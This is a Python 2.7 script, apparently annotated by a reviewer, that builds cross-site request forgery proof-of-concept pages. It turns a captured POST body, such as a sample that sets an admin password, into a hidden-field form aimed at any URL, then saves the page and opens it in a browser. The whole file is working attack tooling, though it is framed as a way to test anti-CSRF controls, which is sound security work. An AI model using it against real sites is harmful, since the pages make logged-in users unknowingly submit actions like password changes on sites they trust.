- #!/usr/bin/python2.7
- #CSRF-GENERATOR
- import time
- import os
- import urllib, webbrowser
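# Raw POST body to replay, e.g. "name=admin&password=hacked123". It is read
# once at start-up and consumed by parse_request() through this module-level
# name. The original `global in_w` statement was dropped: at module scope it
# has no effect.
in_w = raw_input('POST request (e.g. name=admin&password=hacked123): ')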
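def parse_request(var=False, value=False, longz=False):
    """Split the captured POST body in ``in_w`` into parameter names and values.

    The body is read from the module-level ``in_w`` string. One view of the
    parsed body is returned, chosen by the first truthy flag in this order:

    * ``var``   -- list of parameter names
    * ``value`` -- list of parameter values, in the same order as the names
    * ``longz`` -- number of parameters

    With no flag set the function returns ``None``.
    """
    names = []
    values = []
    # Split on the separators *before* percent-decoding, so an encoded "%26"
    # or "%3D" inside a value is not mistaken for a delimiter.
    for pair in in_w.split('&'):
        if not pair:
            # Empty segment from a leading, trailing or doubled "&"; there is
            # no parameter to record.
            continue
        # partition() keeps everything after the first "=" as the value and
        # gives an empty value for a bare "flag" parameter. Indexing
        # split('=')[1] raised IndexError on "flag" and cut "a=b=c" to "b".
        raw_name, _, raw_value = pair.partition('=')
        # NOTE(review): unquote() leaves "+" untouched; if callers paste
        # form-encoded bodies where "+" means a space, unquote_plus() would be
        # the matching decoder -- confirm before switching.
        names.append(urllib.unquote(raw_name))
        values.append(urllib.unquote(raw_value))

    if var:
        return names
    if value:
        return values
    if longz:
        return len(names)
    return None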
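def generate_csrf_poc(target_url):
    """Build an HTML page with a POST form that replays the captured request.

    Every parameter returned by parse_request() becomes a hidden ``<input>``
    in a form whose ``action`` is ``target_url``. The page is returned as a
    string. Submitting such a form has an effect only when the endpoint
    accepts a cross-site POST without a per-request anti-CSRF token or an
    equivalent Origin / SameSite-cookie check, which is the control this
    page is meant to verify.
    """
    import cgi  # Python 2.7 stdlib; imported locally so the file header is untouched

    def attr(text):
        # Escape &, <, > and the double quote. The URL and the request
        # parameters are pasted in from outside, and unescaped they could
        # close the attribute and inject markup or script into the file that
        # is later opened in the local browser.
        return cgi.escape(text, True)

    names = parse_request(True, False, False)
    values = parse_request(False, True, False)

    # "<form ... />" in the original is not valid HTML (form is not a void
    # element); emit a normal opening tag instead.
    lines = [
        '<html>',
        '<body>',
        '<form action="%s" method="POST">' % attr(target_url),
    ]
    # Names and values are appended pairwise by parse_request(), so zip()
    # walks them in step without a separate length lookup.
    for name, val in zip(names, values):
        lines.append(
            '<input type="hidden" name="%s" value="%s"/>' % (attr(name), attr(val))
        )
    lines.append('<input type="submit" value="csrf"/>')
    lines.extend(['</form>', '</body>', '</html>'])
    return '\n'.join(lines)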
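def main():
    """Prompt for the target URL, write the generated form to disk and open it.

    The page is printed to stdout and saved in the current working directory
    as ``<unix-timestamp>.html``. Its absolute path is then printed and passed
    to the default web browser.
    """
    ask_for_url = raw_input('url address: ')

    # Render once and reuse the result, so the printed page and the saved
    # page cannot differ (the original generated it twice).
    html_doc = generate_csrf_poc(ask_for_url)
    print(html_doc)

    f_name = str(time.time()) + '.html'
    path = os.path.abspath(f_name)
    print('csrf file: ' + path)

    # The context manager closes the handle even if the write fails, and the
    # file is created only after the page was generated successfully.
    with open(f_name, 'w') as csrf_file:
        csrf_file.write(html_doc)

    webbrowser.open(path)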
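# Start the interactive flow only when the file is executed as a script, so
# importing the module does not also write a file and launch a browser.
if __name__ == '__main__':
    main()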